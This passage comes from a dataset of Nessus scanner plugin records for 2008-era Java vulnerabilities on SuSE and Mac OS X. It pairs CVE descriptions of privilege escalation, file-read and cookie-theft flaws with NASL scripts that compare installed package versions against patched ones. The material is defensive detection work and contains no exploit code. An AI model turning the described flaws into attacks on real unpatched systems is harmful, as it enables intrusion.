It\nfixes lots of bugs and various security issues :\n\n - A vulnerability in the Java Runtime Environment may\n allow an untrusted Java Web Start application to\n determine the location of the Java Web Start cache and\n the username of the user running the Java Web Start\n application. (CVE-2008-5341)\n\n - A vulnerability in the Java Runtime Environment with\n launching Java Web Start applications may allow an\n untrusted Java Web Start application to escalate\n privileges. For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted application. (CVE-2008-5340)\n\n - The UTF-8 (Unicode Transformation Format-8) decoder in\n the Java Runtime Environment (JRE) accepts encodings\n that are longer than the 'shortest' form. This behavior\n is not a vulnerability in Java SE. However, it may be\n leveraged to exploit systems running software that\n relies on the JRE UTF-8 decoder to reject non-shortest\n form sequences. For example, non-shortest form sequences\n may be decoded into illegal URIs, which may then allow\n files that are not otherwise accessible to be read, if\n the URIs are not checked following UTF-8 decoding.\n (CVE-2008-5351)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5356)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. 
For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5357)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing GIF images may allow an\n untrusted Java Web Start application to escalate\n privileges. For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5358)\n\n - A security vulnerability in the the Java Web Start\n BasicService allows untrusted applications that are\n downloaded from another system to request local files to\n be displayed by the browser of the user running the\n untrusted application. (CVE-2008-5342)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=489052\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5340.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5341.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5342.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5351.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5356.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5357.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5358.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 736.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 189, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-fonts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = 
get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"java-1_6_0-ibm-1.6.0-124.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"java-1_6_0-ibm-fonts-1.6.0-124.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"java-1_6_0-ibm-jdbc-1.6.0-124.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"java-1_6_0-ibm-alsa-1.6.0-124.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"java-1_6_0-ibm-plugin-1.6.0-124.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T16:10:27", "description": "\nThe remote Mac OS X 10.5 host is running a version of Java for Mac OS X\nthat is missing Update 3. \n\nThe remote version of this software contains several security\nvulnerabilities in Java Web Start and the Java Plug-in. For instance,\nthey may allow untrusted Java Web Start applications and untrusted Java\napplets to obtain elevated privileges. 
If an attacker can lure a user\non the affected host into visiting a specially crafted web page with a\nmalicious Java applet, he could leverage these issues to execute\narbitrary code subject to the user's privileges.", "edition": 11, "published": "2009-02-13T00:00:00", "title": "Mac OS X : Java for Mac OS X 10.5 Update 3", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5340", "CVE-2008-5343", "CVE-2008-2086", "CVE-2008-5342"], "modified": "2009-02-13T00:00:00", "cpe": [], "id": "MACOSX_JAVA_10_5_UPDATE3.NASL", "href": "https://www.tenable.com/plugins/nessus/35686", "sourceData": "#TRUSTED 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\n#\n# (C) Tenable Network Security, Inc.\n#\n\nif (!defined_func(\"bn_random\")) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35686);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/07/14\");\n\n script_cve_id(\n \"CVE-2008-2086\",\n \"CVE-2008-5340\",\n \"CVE-2008-5342\",\n \"CVE-2008-5343\"\n );\n script_bugtraq_id(32892);\n\n script_name(english:\"Mac OS X : Java for Mac OS X 10.5 Update 3\");\n script_summary(english:\"Checks for Java Update 3 on Mac OS X 10.5\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a version of Java that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\"\nThe remote Mac OS X 10.5 host is running a version of Java for Mac OS X\nthat is missing Update 3. \n\nThe remote version of this software contains several security\nvulnerabilities in Java Web Start and the Java Plug-in. For instance,\nthey may allow untrusted Java Web Start applications and untrusted Java\napplets to obtain elevated privileges. 
If an attacker can lure a user\non the affected host into visiting a specially crafted web page with a\nmalicious Java applet, he could leverage these issues to execute\narbitrary code subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT3437\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2009/Feb/msg00003.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Java for Mac OS X 10.5 Update 3.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n\n exit(0);\n}\n\n\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nfunction exec(cmd)\n{\n local_var ret, buf;\n\n if (islocalhost())\n buf = pread(cmd:\"/bin/bash\", argv:make_list(\"bash\", \"-c\", cmd));\n else\n {\n ret = ssh_open_connection();\n if (!ret) exit(0);\n buf = ssh_cmd(cmd:cmd);\n ssh_close_connection();\n }\n if (buf !~ \"^[0-9]\") exit(0);\n\n buf = 
chomp(buf);\n return buf;\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif (!packages) exit(0);\n\n\n# Mac OS X 10.5 only.\nuname = get_kb_item(\"Host/uname\");\nif (egrep(pattern:\"Darwin.* 9\\.\", string:uname))\n{\n plist = \"/System/Library/Frameworks/JavaVM.framework/Versions/A/Resources/version.plist\";\n cmd = string(\n \"cat \", plist, \" | \",\n \"grep -A 1 CFBundleVersion | \",\n \"tail -n 1 | \",\n 'sed \\'s/.*string>\\\\(.*\\\\)<\\\\/string>.*/\\\\1/g\\''\n );\n version = exec(cmd:cmd);\n if (!strlen(version)) exit(0);\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Fixed in version 12.2.2.\n if (\n ver[0] < 12 ||\n (\n ver[0] == 12 &&\n (\n ver[1] < 2 ||\n (ver[1] == 2 && ver[2] < 2)\n )\n )\n ) security_hole(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T16:10:48", "description": "The remote Mac OS X 10.4 host is running a version of Java for Mac OS X\nolder than release 8. \n\nThe remote version of this software contains several security\nvulnerabilities in Java Web Start and the Java Plug-in. For instance,\nthey may allow untrusted Java Web Start applications and untrusted Java\napplets to obtain elevated privileges. 
If an attacker can lure a user\non the affected host into visiting a specially crafted web page with a\nmalicious Java applet, he could leverage these issues to execute\narbitrary code subject to the user's privileges.", "edition": 11, "published": "2009-02-13T00:00:00", "title": "Mac OS X : Java for Mac OS X 10.4 Release 8", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5340", "CVE-2008-5343", "CVE-2008-2086", "CVE-2008-5342"], "modified": "2009-02-13T00:00:00", "cpe": [], "id": "MACOSX_JAVA_REL8.NASL", "href": "https://www.tenable.com/plugins/nessus/35685", "sourceData": "#TRUSTED 74b0301aa9b4c6a7f825ea70f12b8c636d775ee3dc4033091b34a857bc0cc1a2ad7c104373687cdea60866f41c2e88db813c457f41cded4dbb700cfaf13b0fe8defc5c15c5432d033dd5d03262438b299850d278c9dd66fc17e9e8d9941d77bc613b68537e157d7d0a77b4c44356d7ad20e1b99212bcbb0c894fdb685ecec376491028b0ed93a072b5de8ff9eb4664d706b5e58885b971a68cad7a3b1133549217a743144f4a2c185e87d6690c29bcb949950c2c821113641b11bfb4c92ca66416f87ceabaff34c163af6e8f431b0ca3e5e9c7b8302d52dde5e45482ecd3a62dc8ceb2d363a2950cd21770338291894e93a21df41091eea9bf833146293cfcef4b66db2e5d555da646cea6096a67e1e75ed5bb2899173a1b6c8a6450976603f1b3db69cca38b319c4414ad76a37c1989792e935ebce3d53c718f11bf10acdfc6b281128024434e7aedd5ecc98b2bd4e1ab81affd36135e88efa2d8e6abc066182e3f964df6b9921eb1c5de92cc74bf13322f02e39ed8f0a54f2550b9ca8e613a61842a8c7ba6f92a010d74958d74453e945d4b650b5cba2fc35506eed1188ba87d5efb432d17141d10e0726834dafdfee8ca91056fff80cc18af095be91c06e226c0dc28326ed477f0b5c3fd4621f030bde7eae46b3b9d3e0fac3aa75f88080361a60492115ee9b14750533fd0adbf8644db6da7ec0c749baaa8632b94368522\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\nif (!defined_func(\"bn_random\")) exit(0);\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35685);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/07/14\");\n\n script_cve_id(\n \"CVE-2008-2086\",\n \"CVE-2008-5340\",\n 
\"CVE-2008-5342\",\n \"CVE-2008-5343\"\n );\n script_bugtraq_id(32892);\n\n script_name(english:\"Mac OS X : Java for Mac OS X 10.4 Release 8\");\n script_summary(english:\"Check for Java Release 8 on Mac OS X 10.4\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a version of Java that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X 10.4 host is running a version of Java for Mac OS X\nolder than release 8. \n\nThe remote version of this software contains several security\nvulnerabilities in Java Web Start and the Java Plug-in. For instance,\nthey may allow untrusted Java Web Start applications and untrusted Java\napplets to obtain elevated privileges. If an attacker can lure a user\non the affected host into visiting a specially crafted web page with a\nmalicious Java applet, he could leverage these issues to execute\narbitrary code subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT3436\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2009/Feb/msg00002.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Java for Mac OS X 10.4 release 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local 
Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n\n exit(0);\n}\n\n\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nfunction exec(cmd)\n{\n local_var ret, buf;\n\n if (islocalhost())\n buf = pread(cmd:\"/bin/bash\", argv:make_list(\"bash\", \"-c\", cmd));\n else\n {\n ret = ssh_open_connection();\n if (!ret) exit(0);\n buf = ssh_cmd(cmd:cmd);\n ssh_close_connection();\n }\n\n if (buf !~ \"^[0-9]\") exit(0);\n\n buf = chomp(buf);\n return buf;\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif (!packages) exit(0);\n\n\n# Mac OS X 10.4.11 only.\nuname = get_kb_item(\"Host/uname\");\nif (egrep(pattern:\"Darwin.* 8\\.11\\.\", string:uname))\n{\n plist = \"/System/Library/Frameworks/JavaVM.framework/Versions/A/Resources/version.plist\";\n cmd = string(\n \"cat \", plist, \" | \",\n \"grep -A 1 CFBundleVersion | \",\n \"tail -n 1 | \",\n 'sed \\'s/.*string>\\\\(.*\\\\)<\\\\/string>.*/\\\\1/g\\''\n );\n version = exec(cmd:cmd);\n if (!strlen(version)) exit(0);\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Fixed in version 11.8.2.\n if (\n ver[0] < 11 ||\n (\n ver[0] == 11 &&\n (\n ver[1] < 8 ||\n (ver[1] == 8 && ver[2] < 2)\n )\n )\n ) security_hole(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:44:37", "description": "This update brings IBM Java 5 to Service Release 9.\n\nIt fixes the following security problems :\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) may allow an untrusted applet or application to\n list the contents of the home directory of the user\n running the 
applet or application. (CVE-2008-5350)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with parsing zip files may allow an untrusted\n applet or application to read arbitrary memory locations\n in the process that the applet or application is running\n in. (CVE-2008-5346)\n\n - A vulnerability in Java Web Start and Java Plug-in may\n allow hidden code on a host to make network connections\n to that host and to hijack HTTP sessions using cookies\n stored in the browser. (CVE-2008-5343)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n with applet classloading may allow an untrusted applet\n to read arbitrary files on a system that the applet runs\n on and make network connections to hosts other than the\n host it was loaded from. (CVE-2008-5344)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) image processing code may allow an\n untrusted applet or application to escalate privileges.\n For example, an untrusted applet may grant itself\n permissions to read and write local files or execute\n local applications that are accessible to the user\n running the untrusted applet. (CVE-2008-5359)\n\n - A vulnerability in the Java Runtime Environment may\n allow an untrusted Java Web Start application to\n determine the location of the Java Web Start cache and\n the username of the user running the Java Web Start\n application. (CVE-2008-5341)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n may allow an untrusted Java Web Start application to\n make network connections to hosts other than the host\n that the application is downloaded from. (CVE-2008-5339)\n\n - A vulnerability in the Java Runtime Environment with\n launching Java Web Start applications may allow an\n untrusted Java Web Start application to escalate\n privileges. 
For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted application. (CVE-2008-5340)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with authenticating users through Kerberos may\n lead to a Denial of Service (DoS) to the system as a\n whole, due to excessive consumption of operating system\n resources. (CVE-2008-5348)\n\n - A vulnerability in Java Web Start may allow certain\n trusted operations to be performed, such as modifying\n system properties. (CVE-2008-2086)\n\n - The Java Runtime Environment (JRE) allows code loaded\n from the local filesystem to access localhost. This may\n allow code that is maliciously placed on the local\n filesystem and then subsequently run, to have network\n access to localhost that would not otherwise be allowed\n if the code were loaded from a remote host. This may be\n leveraged to steal cookies and hijack sessions (for\n domains that map a name to the localhost).\n (CVE-2008-5345)\n\n - The UTF-8 (Unicode Transformation Format-8) decoder in\n the Java Runtime Environment (JRE) accepts encodings\n that are longer than the 'shortest' form. This behavior\n is not a vulnerability in Java SE. However, it may be\n leveraged to exploit systems running software that\n relies on the JRE UTF-8 decoder to reject non-shortest\n form sequences. For example, non-shortest form sequences\n may be decoded into illegal URIs, which may then allow\n files that are not otherwise accessible to be read, if\n the URIs are not checked following UTF-8 decoding.\n (CVE-2008-5351)\n\n - The Java Runtime Environment creates temporary files\n with insufficiently random names. 
This may be leveraged\n to write JAR files which may then be loaded as untrusted\n applets and Java Web Start applications to access and\n provide services from localhost and hence steal cookies.\n (CVE-2008-5360)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) related to deserializing calendar objects may\n allow an untrusted applet or application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5353)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5356)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) may allow an untrusted Java\n application that is launched through the command line to\n escalate privileges. For example, the untrusted Java\n application may grant itself permissions to read and\n write local files or execute local applications that are\n accessible to the user running the untrusted Java\n application. (CVE-2008-5354)\n\n This vulnerability cannot be exploited by an applet or\n Java Web Start application.\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. 
(CVE-2008-5357)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) with unpacking applets and Java Web\n Start applications using the 'unpack200' JAR unpacking\n utility may allow an untrusted applet or application to\n escalate privileges. For example, an untrusted applet\n may grant itself permissions to read and write local\n files or execute local applications that are accessible\n to the user running the untrusted applet.\n (CVE-2008-5352)\n\n - A security vulnerability in the Java Web Start\n BasicService allows untrusted applications that are\n downloaded from another system to request local files to\n be displayed by the browser of the user running the\n untrusted application. (CVE-2008-5342)\n\nReferences can be found on:\nhttp://www-128.ibm.com/developerworks/java/jdk/alerts/", "edition": 25, "published": "2009-09-24T00:00:00", "title": "SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 5960)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_JAVA-1_5_0-IBM-5960.NASL", "href": "https://www.tenable.com/plugins/nessus/41527", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41527);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", 
\"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5348\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 5960)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings IBM Java 5 to Service Release 9.\n\nIt fixes the following security problems :\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) may allow an untrusted applet or application to\n list the contents of the home directory of the user\n running the applet or application. (CVE-2008-5350)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with parsing zip files may allow an untrusted\n applet or application to read arbitrary memory locations\n in the process that the applet or application is running\n in. (CVE-2008-5346)\n\n - A vulnerability in Java Web Start and Java Plug-in may\n allow hidden code on a host to make network connections\n to that host and to hijack HTTP sessions using cookies\n stored in the browser. (CVE-2008-5343)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n with applet classloading may allow an untrusted applet\n to read arbitrary files on a system that the applet runs\n on and make network connections to hosts other than the\n host it was loaded from. 
(CVE-2008-5344)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) image processing code may allow an\n untrusted applet or application to escalate privileges.\n For example, an untrusted applet may grant itself\n permissions to read and write local files or execute\n local applications that are accessible to the user\n running the untrusted applet. (CVE-2008-5359)\n\n - A vulnerability in the Java Runtime Environment may\n allow an untrusted Java Web Start application to\n determine the location of the Java Web Start cache and\n the username of the user running the Java Web Start\n application. (CVE-2008-5341)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n may allow an untrusted Java Web Start application to\n make network connections to hosts other than the host\n that the application is downloaded from. (CVE-2008-5339)\n\n - A vulnerability in the Java Runtime Environment with\n launching Java Web Start applications may allow an\n untrusted Java Web Start application to escalate\n privileges. For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted application. (CVE-2008-5340)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with authenticating users through Kerberos may\n lead to a Denial of Service (DoS) to the system as a\n whole, due to excessive consumption of operating system\n resources. (CVE-2008-5348)\n\n - A vulnerability in Java Web Start may allow certain\n trusted operations to be performed, such as modifying\n system properties. (CVE-2008-2086)\n\n - The Java Runtime Environment (JRE) allows code loaded\n from the local filesystem to access localhost. 
This may\n allow code that is maliciously placed on the local\n filesystem and then subsequently run, to have network\n access to localhost that would not otherwise be allowed\n if the code were loaded from a remote host. This may be\n leveraged to steal cookies and hijack sessions (for\n domains that map a name to the localhost).\n (CVE-2008-5345)\n\n - The UTF-8 (Unicode Transformation Format-8) decoder in\n the Java Runtime Environment (JRE) accepts encodings\n that are longer than the 'shortest' form. This behavior\n is not a vulnerability in Java SE. However, it may be\n leveraged to exploit systems running software that\n relies on the JRE UTF-8 decoder to reject non-shortest\n form sequences. For example, non-shortest form sequences\n may be decoded into illegal URIs, which may then allow\n files that are not otherwise accessible to be read, if\n the URIs are not checked following UTF-8 decoding.\n (CVE-2008-5351)\n\n - The Java Runtime Environment creates temporary files\n with insufficiently random names. This may be leveraged\n to write JAR files which may then be loaded as untrusted\n applets and Java Web Start applications to access and\n provide services from localhost and hence steal cookies.\n (CVE-2008-5360)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) related to deserializing calendar objects may\n allow an untrusted applet or application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5353)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. 
For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5356)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) may allow an untrusted Java\n application that is launched through the command line to\n escalate privileges. For example, the untrusted Java\n application may grant itself permissions to read and\n write local files or execute local applications that are\n accessible to the user running the untrusted Java\n application. (CVE-2008-5354)\n\n This vulnerability cannot be exploited by an applet or\n Java Web Start application.\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5357)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) with unpacking applets and Java Web\n Start applications using the 'unpack200' JAR unpacking\n utility may allow an untrusted applet or application to\n escalate privileges. For example, an untrusted applet\n may grant itself permissions to read and write local\n files or execute local applications that are accessible\n to the user running the untrusted applet.\n (CVE-2008-5352)\n\n - A security vulnerability in the the Java Web Start\n BasicService allows untrusted applications that are\n downloaded from another system to request local files to\n be displayed by the browser of the user running the\n untrusted application. 
(CVE-2008-5342)\n\nReferences can be found on:\nhttp://www-128.ibm.com/developerworks/java/jdk/alerts/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2086.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5339.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5340.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5341.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5342.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5343.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5344.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5345.html\"\n );\n script_set_attribute(\n 